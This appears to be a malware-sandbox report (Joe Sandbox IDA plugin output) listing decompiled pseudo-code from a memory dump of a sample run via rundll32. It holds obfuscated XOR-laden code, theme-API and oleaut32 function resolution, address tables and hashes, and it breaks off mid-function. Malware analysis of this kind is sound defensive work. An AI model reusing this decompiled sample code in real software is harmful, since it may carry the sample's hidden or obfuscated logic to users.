						_t192 = _t191 + _t316;
						 *(_t348 - 0x79bd4bfe) =  *(_t348 - 0x79bd4bfe) ^ _t192;
						_t193 = _t192 +  *_t192;
						 *_t193 =  *_t193 + _t193;
						_t194 = _t193 + _t193;
						 *(_t348 - 0x79b9bbfe) =  *(_t348 - 0x79b9bbfe) ^ _t194;
						_t195 = _t194 +  *_t194;
						 *_t195 =  *_t195 + _t195;
						_t196 = _t195 + _t195;
						 *(_t348 - 0x79bad3fe) =  *(_t348 - 0x79bad3fe) ^ _t196;
						_t197 = _t196 +  *_t196;
						 *_t197 =  *_t197 + _t197;
						_t198 = _t197 + _t310;
						 *(_t348 - 0x79bc0bfe) =  *(_t348 - 0x79bc0bfe) ^ _t198;
						_t199 = _t198 +  *_t198;
						 *_t199 =  *_t199 + _t199;
						_t200 = _t199 + _t310;
						 *(_t348 - 0x79bb03fe) =  *(_t348 - 0x79bb03fe) ^ _t200;
						_t201 = _t200 +  *_t200;
						 *_t201 =  *_t201 + _t201;
						_t202 = _t201 + _t332;
						 *(_t348 - 0x79ba7ffe) =  *(_t348 - 0x79ba7ffe) ^ _t202;
						_t203 = _t202 +  *_t202;
						 *_t203 =  *_t203 + _t203;
						_t204 = _t203 + _t332;
						 *(_t348 - 0x79baebfe) =  *(_t348 - 0x79baebfe) ^ _t204;
						_t205 = _t204 +  *_t204;
						 *_t205 =  *_t205 + _t205;
						_t206 = _t205 + _t316;
						 *(_t348 - 0x79bbc7fe) =  *(_t348 - 0x79bbc7fe) ^ _t206;
						_t207 = _t206 +  *_t206;
						 *_t207 =  *_t207 + _t207;
						_t208 = _t207 + _t316;
						 *(_t348 - 0x79bd4ffe) =  *(_t348 - 0x79bd4ffe) ^ _t208;
						_t209 = _t208 +  *_t208;
						 *_t209 =  *_t209 + _t209;
						_t210 = _t209 + _t209;
						 *(_t348 - 0x79bb4bfe) =  *(_t348 - 0x79bb4bfe) ^ _t210;
						_t211 = _t210 +  *_t210;
						 *_t211 =  *_t211 + _t211;
						_t212 = _t211 + _t211;
						 *(_t348 - 0x79b8fffe) =  *(_t348 - 0x79b8fffe) ^ _t212;
						_t213 = _t212 +  *_t212;
						 *_t213 =  *_t213 + _t213;
						 *((intOrPtr*)(_t316 + _t348 + 0x46ac0286)) =  *((intOrPtr*)(_t316 + _t348 + 0x46ac0286)) + _t310;
						_t214 =  *_t332;
						 *_t332 = _t213;
						 *_t214 =  *_t214 + _t214;
						 *_t214 =  *_t214 + _t214;
						_t216 =  *_t332;
						 *_t332 = 0x64028631;
						 *0x64028631 =  *0x64028631 + _t216;
						 *0x64028631 =  *0x64028631 + _t216;
						 *_t332 = 0x31;
						asm("lodsb");
						_t219 =  *_t332;
						 *0x64028631 =  *0x64028631 + _t219;
						 *0x64028631 =  *0x64028631 + _t219;
						 *_t332 = 0x31;
						asm("les eax, [edx-0x7a]");
						_t222 =  *_t332 +  *0x64028631;
						 *0x64028631 =  *0x64028631 + _t222;
						 *((intOrPtr*)(_t316 + _t348 + 0x46980286)) =  *((intOrPtr*)(_t316 + _t348 + 0x46980286)) + _t316;
						_t223 =  *_t332;
						 *_t332 = _t222;
						 *0x64028631 =  *0x64028631 + _t223;
						 *0x64028631 =  *0x64028631 + _t223;
						 *_t332 = _t223;
						_t225 =  *0x28647;
						 *0x64028631 =  *0x64028631 + _t225;
						 *((intOrPtr*)(_t316 + _t348 + 0x43140286)) =  *((intOrPtr*)(_t316 + _t348 + 0x43140286)) + _t225;
						_t226 =  *_t332;
						 *_t332 = _t225;
						 *0x64028631 =  *0x64028631 + _t226;
						 *0x64028631 =  *0x64028631 + _t226;
						_t333 = _t332 + 1;
						_t228 =  *_t333;
						 *_t333 =  *0x9c028631;
						 *0x64028631 =  *0x64028631 + _t228;
						 *0x64028631 =  *0x64028631 + _t228;
						asm("pushfd");
						 *(_t348 - 0x79b927fe) =  *(_t348 - 0x79b927fe) ^ 0x64028631;
						_t229 = _t228 +  *0x64028631;
						 *0x64028631 =  *0x64028631 + _t229;
						 *0xC4050C62 =  *((intOrPtr*)(0xc4050c62)) + _t310 + 1;
						_t230 =  *_t333;
						 *_t333 = _t229;
						 *0x64028631 =  *0x64028631 + _t230;
						 *0x64028631 =  *0x64028631 + _t230;
						_t231 = _t357;
						 *(_t348 - 0x79b8c3fe) =  *(_t348 - 0x79b8c3fe) ^ _t231;
						_t232 = _t231 +  *_t231;
						 *_t232 =  *_t232 + _t232;
						 *((intOrPtr*)(_t232 + 0x31)) =  *((intOrPtr*)(_t232 + 0x31)) + _t333;
						 *_t333 = _t232;
						asm("pushfd");
						_t359 = _t230 + 1;
						_t234 =  *_t333;
						 *_t234 =  *_t234 + _t234;
						 *_t234 =  *_t234 + _t234;
						asm("insb");
						 *(_t348 - 0x79bc43fe) =  *(_t348 - 0x79bc43fe) ^ _t234;
						 *((intOrPtr*)(_t234 +  *_t234)) =  *((intOrPtr*)(_t234 +  *_t234)) + _t234 +  *_t234;
						_v117 = _v117 + _t333;
						_push( &_a1);
						_push(_t359);
						_push(0x27ddc49);
						_push( *[fs:eax]);
						 *[fs:eax] = _t359;
						 *0x2865798 =  *0x2865798 + 1;
						if( *0x2865798 == 0) {
							E027DD220(E027DD6B4(0x28657a4));
							E027DC34C();
							_t335 =  *0x27dbe24; // 0x27dbe28
							E027D4BBC(0x2863264, 0x16, _t335);
							_t336 =  *E027DBDA4; // 0x27dbda8
							E027D4BBC(0x286322c, 7, _t336);
							_t337 =  *0x27d10cc; // 0x27d10d0
							E027D4BBC(0x2863144, 2, _t337);
							E027D40E8(0x286313c);
							_t338 =  *0x27d7f60; // 0x27d7f64
							E027D548C(0x2865794, _t338);
							_t339 =  *0x27d7f3c; // 0x27d7f40
							E027D548C(0x2865790, _t339);
							_t340 =  *0x27d10cc; // 0x27d10d0
							E027D4BBC(0x2865758, 7, _t340);
							_t341 =  *0x27d10cc; // 0x27d10d0
							E027D4BBC(0x286572c, 7, _t341);
							_t342 =  *0x27d10cc; // 0x27d10d0
							E027D4BBC(0x2865710, 7, _t342);
							_t343 =  *0x27d10cc; // 0x27d10d0
							E027D4BBC(0x28656e0, 0xc, _t343);
							_t344 =  *0x27d10cc; // 0x27d10d0
							E027D4BBC(0x28656b0, 0xc, _t344);
							E027D40E8(0x28656ac);
							E027D40E8(0x28656a8);
							E027D40E8(0x28656a4);
							E027D40E8(0x28656a0);
							E027D40E8(0x2865698);
							E027D40E8(0x2865694);
							E027D40E8(0x2865688);
							E027D40E8(0x28630e4);
							E027D47F4(0x28630d0);
							E027D40E8(0x28630cc);
						}
						_pop(_t334);
						 *[fs:eax] = _t334;
						_push(E027DDC50);
						return 0;
					}
					_t284 =  *_t332;
					 *_t332 = _t182;
					 *0x28642 =  *0x28642 + _t284;
					 *0x28642 =  *0x28642 + _t284;
					asm("adc [edx], dh");
					_t285 =  *_t332;
					 *_t332 = _t284;
					 *(_t310 - 0x7a) =  *(_t310 - 0x7a) | _t285;
					_t286 = _t285 +  *0x28642;
					 *0x28642 =  *0x28642 + _t286;
					 *((intOrPtr*)(_t332 + _t348)) =  *((intOrPtr*)(_t332 + _t348)) + _t316;
					_t287 =  *_t332;
					 *_t332 = _t286;
					 *((intOrPtr*)(_t348 + 0xa190a)) = es;
					 *0x28642 =  *0x28642 + _t287;
					 *0x28642 =  *0x28642 + _t287;
					 *_t332 =  *_t332 | _t332;
					 *_t332 = _t287;
					_t290 =  *_t332;
					 *_t332 = 0x28642;
					 *0x28642 =  *0x28642 + _t290;
					 *0x28642 =  *0x28642 + _t290;
					_t291 = _t290 + 0x32;
					_t190 =  *_t332;
					 *_t332 = _t291;
					if(_t291 < 0) {
						goto L10;
					}
					_t292 =  *_t332;
					 *_t332 = _t190;
					 *0x28642 =  *0x28642 + _t292;
					 *0x28642 =  *0x28642 + _t292;
					 *_t332 =  *_t332 + _t332;
					_t293 =  *_t332;
					 *_t332 = _t292;
					_push(0x28645);
					 *0x28642 =  *0x28642 + _t293;
					_t182 = _t293 + _t310;
					goto L9;
				}
				 *_t330 = _t166;
				 *_t330 =  *_t330 ^ 0x00000086;
				_t362 = _t346 + 1;
				_t296 =  *_t330;
				 *_t330 =  *_t330 +  *( *_t330);
				if(_t362 < 0) {
					L4:
					asm("sbb [esi-0x7a], al");
					_t166 =  *_t330;
					 *_t330 = _t296 +  *((intOrPtr*)(_t296 + 0x32));
					L5:
					asm("lodsb");
					goto L6;
				}
				 *_t330 = _t296;
				_t299 = _t356;
				_t356 =  *_t330 + 1;
				_t166 =  *_t330;
				 *_t330 = _t299;
				if(_t362 < 0) {
					goto L5;
				}
				 *_t330 = _t166;
				asm("lock inc esi");
				_push(0xfc028632);
				_t348 = __esi + 1;
				asm("pushad");
				_t303 =  *_t330 ^  *(_t348 - 0x79bc4ffe);
				 *_t330 = _t303;
				_pop(_t356);
				_t310 = _t310 +  *((intOrPtr*)(_t303 + 0x32)) + 1;
				_t305 =  *_t330;
				_push(_t305);
				_t306 = _t305 ^  *(_t348 - 0x79ba8ffe);
				_t316 = _t316 +  *((intOrPtr*)(_t306 + 0x32));
				_t296 =  *_t330;
				 *_t330 = _t306;
				goto L4;
			}





































































































                          0x027dd804
                          0x027dd804
                          0x027dd809
                          0x027dd819
                          0x027dd821
                          0x027dd829
                          0x027dd839
                          0x027dd841
                          0x027dd847
                          0x027dd849
                          0x027dd84f
                          0x027dd859
                          0x027dd85f
                          0x027dd865
                          0x027dd866
                          0x027dd86a
                          0x027dd86c
                          0x027dd87d
                          0x027dd87e
                          0x027dd881
                          0x027dd887
                          0x027dd88e
                          0x027dd890
                          0x027dd892
                          0x027dd894
                          0x027dd8dd
                          0x027dd8dd
                          0x027dd8de
                          0x027dd8e4
                          0x027dd8e8
                          0x027dd8ed
                          0x027dd8ee
                          0x027dd8f0
                          0x027dd8f2
                          0x027dd8f4
                          0x027dd8f6
                          0x027dd8f8
                          0x027dd8fb
                          0x027dd8fd
                          0x027dd8ff
                          0x027dd902
                          0x027dd904
                          0x027dd905
                          0x027dd906
                          0x027dd906
                          0x027dd908
                          0x027dd90a
                          0x027dd90c
                          0x027dd90e
                          0x027dd910
                          0x027dd912
                          0x027dd914
                          0x027dd916
                          0x027dd918
                          0x027dd91a
                          0x027dd921
                          0x027dd923
                          0x027dd92b
                          0x027dd92d
                          0x027dd92f
                          0x027dd92f
                          0x027dd932
                          0x027dd932
                          0x027dd934
                          0x027dd979
                          0x027dd979
                          0x027dd97f
                          0x027dd981
                          0x027dd983
                          0x027dd985
                          0x027dd98b
                          0x027dd98d
                          0x027dd98f
                          0x027dd991
                          0x027dd997
                          0x027dd999
                          0x027dd99b
                          0x027dd99d
                          0x027dd9a3
                          0x027dd9a5
                          0x027dd9a7
                          0x027dd9a9
                          0x027dd9a9
                          0x027dd9af
                          0x027dd9b1
                          0x027dd9b3
                          0x027dd9b5
                          0x027dd9bb
                          0x027dd9bd
                          0x027dd9bf
                          0x027dd9c1
                          0x027dd9c7
                          0x027dd9c9
                          0x027dd9cb
                          0x027dd9cd
                          0x027dd9d3
                          0x027dd9d5
                          0x027dd9d7
                          0x027dd9d9
                          0x027dd9df
                          0x027dd9e1
                          0x027dd9e3
                          0x027dd9e5
                          0x027dd9eb
                          0x027dd9ed
                          0x027dd9ef
                          0x027dd9f1
                          0x027dd9f7
                          0x027dd9f9
                          0x027dd9fb
                          0x027dd9fd
                          0x027dda03
                          0x027dda05
                          0x027dda07
                          0x027dda09
                          0x027dda0f
                          0x027dda11
                          0x027dda13
                          0x027dda15
                          0x027dda1b
                          0x027dda1d
                          0x027dda1f
                          0x027dda21
                          0x027dda27
                          0x027dda29
                          0x027dda2b
                          0x027dda2d
                          0x027dda33
                          0x027dda35
                          0x027dda37
                          0x027dda3e
                          0x027dda3e
                          0x027dda40
                          0x027dda42
                          0x027dda4a
                          0x027dda4a
                          0x027dda4c
                          0x027dda4e
                          0x027dda52
                          0x027dda54
                          0x027dda56
                          0x027dda58
                          0x027dda5a
                          0x027dda5e
                          0x027dda60
                          0x027dda63
                          0x027dda65
                          0x027dda67
                          0x027dda6e
                          0x027dda6e
                          0x027dda70
                          0x027dda72
                          0x027dda76
                          0x027dda78
                          0x027dda7d
                          0x027dda7f
                          0x027dda86
                          0x027dda86
                          0x027dda88
                          0x027dda8a
                          0x027dda91
                          0x027dda92
                          0x027dda92
                          0x027dda94
                          0x027dda96
                          0x027dda98
                          0x027dda99
                          0x027dda9f
                          0x027ddaa1
                          0x027ddaa3
                          0x027ddaaa
                          0x027ddaaa
                          0x027ddaac
                          0x027ddaae
                          0x027ddab0
                          0x027ddab1
                          0x027ddab7
                          0x027ddab9
                          0x027ddabb
                          0x027ddabe
                          0x027ddac0
                          0x027ddac1
                          0x027ddac2
                          0x027ddac4
                          0x027ddac6
                          0x027ddac8
                          0x027ddac9
                          0x027ddad1
                          0x027ddad3
                          0x027ddad4
                          0x027ddad9
                          0x027ddada
                          0x027ddadf
                          0x027ddae2
                          0x027ddae5
                          0x027ddaeb
                          0x027ddafb
                          0x027ddb00
                          0x027ddb0f
                          0x027ddb15
                          0x027ddb24
                          0x027ddb2a
                          0x027ddb39
                          0x027ddb3f
                          0x027ddb49
                          0x027ddb53
                          0x027ddb59
                          0x027ddb63
                          0x027ddb69
                          0x027ddb78
                          0x027ddb7e
                          0x027ddb8d
                          0x027ddb93
                          0x027ddba2
                          0x027ddba8
                          0x027ddbb7
                          0x027ddbbd
                          0x027ddbcc
                          0x027ddbd2
                          0x027ddbdc
                          0x027ddbe6
                          0x027ddbf0
                          0x027ddbfa
                          0x027ddc04
                          0x027ddc0e
                          0x027ddc18
                          0x027ddc22
                          0x027ddc2c
                          0x027ddc36
                          0x027ddc36
                          0x027ddc3d
                          0x027ddc40
                          0x027ddc43
                          0x00000000
                          0x027ddc43
                          0x027dd936
                          0x027dd936
                          0x027dd938
                          0x027dd93a
                          0x027dd93c
                          0x027dd93e
                          0x027dd93e
                          0x027dd940
                          0x027dd943
                          0x027dd945
                          0x027dd947
                          0x027dd94a
                          0x027dd94a
                          0x027dd94c
                          0x027dd950
                          0x027dd952
                          0x027dd954
                          0x027dd956
                          0x027dd95a
                          0x027dd95a
                          0x027dd95c
                          0x027dd95e
                          0x027dd960
                          0x027dd962
                          0x027dd962
                          0x027dd964
                          0x00000000
                          0x00000000
                          0x027dd966
                          0x027dd966
                          0x027dd968
                          0x027dd96a
                          0x027dd96c
                          0x027dd96e
                          0x027dd96e
                          0x027dd970
                          0x027dd975
                          0x027dd977
                          0x00000000
                          0x027dd977
                          0x027dd896
                          0x027dd898
                          0x027dd89d
                          0x027dd89e
                          0x027dd89e
                          0x027dd8a0
                          0x027dd8d4
                          0x027dd8d4
                          0x027dd8da
                          0x027dd8da
                          0x027dd8dc
                          0x027dd8dc
                          0x00000000
                          0x027dd8dc
                          0x027dd8a2
                          0x027dd8a4
                          0x027dd8a5
                          0x027dd8a6
                          0x027dd8a6
                          0x027dd8a8
                          0x00000000
                          0x00000000
                          0x027dd8aa
                          0x027dd8ac
                          0x027dd8b0
                          0x027dd8b5
                          0x027dd8b8
                          0x027dd8b9
                          0x027dd8c2
                          0x027dd8c4
                          0x027dd8c5
                          0x027dd8c6
                          0x027dd8c8
                          0x027dd8c9
                          0x027dd8cf
                          0x027dd8d2
                          0x027dd8d2
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c439408b3853af2e6e14f790e4b82cd9585d9e5050886c4e26f5458f70792ad8
                          • Instruction ID: 46d6771db006d213298d23c8bdf6749f5c000456acb3a883d746852d9916bf95
                          • Opcode Fuzzy Hash: c439408b3853af2e6e14f790e4b82cd9585d9e5050886c4e26f5458f70792ad8
                          • Instruction Fuzzy Hash: 36E12A2914E3D24FE7139BB888656A6BFB1CF4721038A44EFD0D2CF1A3C459486ED766
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02800828 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 90%
                          			E02800828(void* __ebx, void* __ecx) {
				char _v5;
				intOrPtr _t2;
				intOrPtr _t6;
				intOrPtr _t108;
				intOrPtr _t111;

				_t2 =  *0x2865a50; // 0x41d0b80
				E02800620(_t2);
				_push(_t111);
				_push(0x2800bdb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t111;
				 *0x2865a4c =  *0x2865a4c + 1;
				if( *0x2865a48 == 0) {
					 *0x2865a48 = LoadLibraryA("uxtheme.dll");
					if( *0x2865a48 > 0) {
						 *0x2865988 = GetProcAddress( *0x2865a48, "OpenThemeData");
						 *0x286598c = GetProcAddress( *0x2865a48, "CloseThemeData");
						 *0x2865990 = GetProcAddress( *0x2865a48, "DrawThemeBackground");
						 *0x2865994 = GetProcAddress( *0x2865a48, "DrawThemeText");
						 *0x2865998 = GetProcAddress( *0x2865a48, "GetThemeBackgroundContentRect");
						 *0x286599c = GetProcAddress( *0x2865a48, "GetThemeBackgroundContentRect");
						 *0x28659a0 = GetProcAddress( *0x2865a48, "GetThemePartSize");
						 *0x28659a4 = GetProcAddress( *0x2865a48, "GetThemeTextExtent");
						 *0x28659a8 = GetProcAddress( *0x2865a48, "GetThemeTextMetrics");
						 *0x28659ac = GetProcAddress( *0x2865a48, "GetThemeBackgroundRegion");
						 *0x28659b0 = GetProcAddress( *0x2865a48, "HitTestThemeBackground");
						 *0x28659b4 = GetProcAddress( *0x2865a48, "DrawThemeEdge");
						 *0x28659b8 = GetProcAddress( *0x2865a48, "DrawThemeIcon");
						 *0x28659bc = GetProcAddress( *0x2865a48, "IsThemePartDefined");
						 *0x28659c0 = GetProcAddress( *0x2865a48, "IsThemeBackgroundPartiallyTransparent");
						 *0x28659c4 = GetProcAddress( *0x2865a48, "GetThemeColor");
						 *0x28659c8 = GetProcAddress( *0x2865a48, "GetThemeMetric");
						 *0x28659cc = GetProcAddress( *0x2865a48, "GetThemeString");
						 *0x28659d0 = GetProcAddress( *0x2865a48, "GetThemeBool");
						 *0x28659d4 = GetProcAddress( *0x2865a48, "GetThemeInt");
						 *0x28659d8 = GetProcAddress( *0x2865a48, "GetThemeEnumValue");
						 *0x28659dc = GetProcAddress( *0x2865a48, "GetThemePosition");
						 *0x28659e0 = GetProcAddress( *0x2865a48, "GetThemeFont");
						 *0x28659e4 = GetProcAddress( *0x2865a48, "GetThemeRect");
						 *0x28659e8 = GetProcAddress( *0x2865a48, "GetThemeMargins");
						 *0x28659ec = GetProcAddress( *0x2865a48, "GetThemeIntList");
						 *0x28659f0 = GetProcAddress( *0x2865a48, "GetThemePropertyOrigin");
						 *0x28659f4 = GetProcAddress( *0x2865a48, "SetWindowTheme");
						 *0x28659f8 = GetProcAddress( *0x2865a48, "GetThemeFilename");
						 *0x28659fc = GetProcAddress( *0x2865a48, "GetThemeSysColor");
						 *0x2865a00 = GetProcAddress( *0x2865a48, "GetThemeSysColorBrush");
						 *0x2865a04 = GetProcAddress( *0x2865a48, "GetThemeSysBool");
						 *0x2865a08 = GetProcAddress( *0x2865a48, "GetThemeSysSize");
						 *0x2865a0c = GetProcAddress( *0x2865a48, "GetThemeSysFont");
						 *0x2865a10 = GetProcAddress( *0x2865a48, "GetThemeSysString");
						 *0x2865a14 = GetProcAddress( *0x2865a48, "GetThemeSysInt");
						 *0x2865a18 = GetProcAddress( *0x2865a48, "IsThemeActive");
						 *0x2865a1c = GetProcAddress( *0x2865a48, "IsAppThemed");
						 *0x2865a20 = GetProcAddress( *0x2865a48, "GetWindowTheme");
						 *0x2865a24 = GetProcAddress( *0x2865a48, "EnableThemeDialogTexture");
						 *0x2865a28 = GetProcAddress( *0x2865a48, "IsThemeDialogTextureEnabled");
						 *0x2865a2c = GetProcAddress( *0x2865a48, "GetThemeAppProperties");
						 *0x2865a30 = GetProcAddress( *0x2865a48, "SetThemeAppProperties");
						 *0x2865a34 = GetProcAddress( *0x2865a48, "GetCurrentThemeName");
						 *0x2865a38 = GetProcAddress( *0x2865a48, "GetThemeDocumentationProperty");
						 *0x2865a3c = GetProcAddress( *0x2865a48, "DrawThemeParentBackground");
						 *0x2865a40 = GetProcAddress( *0x2865a48, "EnableTheming");
					}
				}
				_v5 =  *0x2865a48 > 0;
				_pop(_t108);
				 *[fs:eax] = _t108;
				_push(0x2800be2);
				_t6 =  *0x2865a50; // 0x41d0b80
				return E02800628(_t6);
			}








                          0x02800832
                          0x02800837
                          0x0280083e
                          0x0280083f
                          0x02800844
                          0x02800847
                          0x0280084a
                          0x02800853
                          0x02800863
                          0x02800868
                          0x0280087b
                          0x0280088d
                          0x0280089f
                          0x028008b1
                          0x028008c3
                          0x028008d5
                          0x028008e7
                          0x028008f9
                          0x0280090b
                          0x0280091d
                          0x0280092f
                          0x02800941
                          0x02800953
                          0x02800965
                          0x02800977
                          0x02800989
                          0x0280099b
                          0x028009ad
                          0x028009bf
                          0x028009d1
                          0x028009e3
                          0x028009f5
                          0x02800a07
                          0x02800a19
                          0x02800a2b
                          0x02800a3d
                          0x02800a4f
                          0x02800a61
                          0x02800a73
                          0x02800a85
                          0x02800a97
                          0x02800aa9
                          0x02800abb
                          0x02800acd
                          0x02800adf
                          0x02800af1
                          0x02800b03
                          0x02800b15
                          0x02800b27
                          0x02800b39
                          0x02800b4b
                          0x02800b5d
                          0x02800b6f
                          0x02800b81
                          0x02800b93
                          0x02800ba5
                          0x02800bb7
                          0x02800bb7
                          0x02800868
                          0x02800bbf
                          0x02800bc5
                          0x02800bc8
                          0x02800bcb
                          0x02800bd0
                          0x02800bda

                          APIs
                          • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,02800BDB), ref: 0280085E
                          • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 02800876
                          • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 02800888
                          • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0280089A
                          • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 028008AC
                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 028008BE
                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 028008D0
                          • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 028008E2
                          • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 028008F4
                          • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 02800906
                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 02800918
                          • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0280092A
                          • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0280093C
                          • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0280094E
                          • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 02800960
                          • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 02800972
                          • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 02800984
                          • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 02800996
                          • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 028009A8
                          • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 028009BA
                          • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 028009CC
                          • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 028009DE
                          • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 028009F0
                          • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 02800A02
                          • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 02800A14
                          • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 02800A26
                          • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 02800A38
                          • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 02800A4A
                          • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 02800A5C
                          • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 02800A6E
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 02800A80
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 02800A92
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 02800AA4
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 02800AB6
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 02800AC8
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 02800ADA
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 02800AEC
                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 02800AFE
                          • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 02800B10
                          • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 02800B22
                          • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 02800B34
                          • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 02800B46
                          • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 02800B58
                          • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 02800B6A
                          • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 02800B7C
                          • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 02800B8E
                          • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 02800BA0
                          • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 02800BB2
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                          • API String ID: 2238633743-2910565190
                          • Opcode ID: 565d4dd986347fdb7643646f6842be20b1c72b08eca56dfebb0779d59c91e806
                          • Instruction ID: 34cf1d00398bab184d9464cf9de79ec374b8c06d37f13f2a6f96d20b1d9d286a
                          • Opcode Fuzzy Hash: 565d4dd986347fdb7643646f6842be20b1c72b08eca56dfebb0779d59c91e806
                          • Instruction Fuzzy Hash: BFA19CFCE91750AFFB51EBA4FCC9E253BAAEB1A7017402965E401DF284D6799810CF12
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027DE1AC Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E027DE1AC() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x28657a8 = E027DE180("VariantChangeTypeEx", E027DDCFC, _t91);
				 *0x28657ac = E027DE180("VarNeg", E027DDD2C, _t91);
				 *0x28657b0 = E027DE180("VarNot", E027DDD2C, _t91);
				 *0x28657b4 = E027DE180("VarAdd", E027DDD38, _t91);
				 *0x28657b8 = E027DE180("VarSub", E027DDD38, _t91);
				 *0x28657bc = E027DE180("VarMul", E027DDD38, _t91);
				 *0x28657c0 = E027DE180("VarDiv", E027DDD38, _t91);
				 *0x28657c4 = E027DE180("VarIdiv", E027DDD38, _t91);
				 *0x28657c8 = E027DE180("VarMod", E027DDD38, _t91);
				 *0x28657cc = E027DE180("VarAnd", E027DDD38, _t91);
				 *0x28657d0 = E027DE180("VarOr", E027DDD38, _t91);
				 *0x28657d4 = E027DE180("VarXor", E027DDD38, _t91);
				 *0x28657d8 = E027DE180("VarCmp", E027DDD44, _t91);
				 *0x28657dc = E027DE180("VarI4FromStr", E027DDD50, _t91);
				 *0x28657e0 = E027DE180("VarR4FromStr", E027DDDBC, _t91);
				 *0x28657e4 = E027DE180("VarR8FromStr", E027DDE28, _t91);
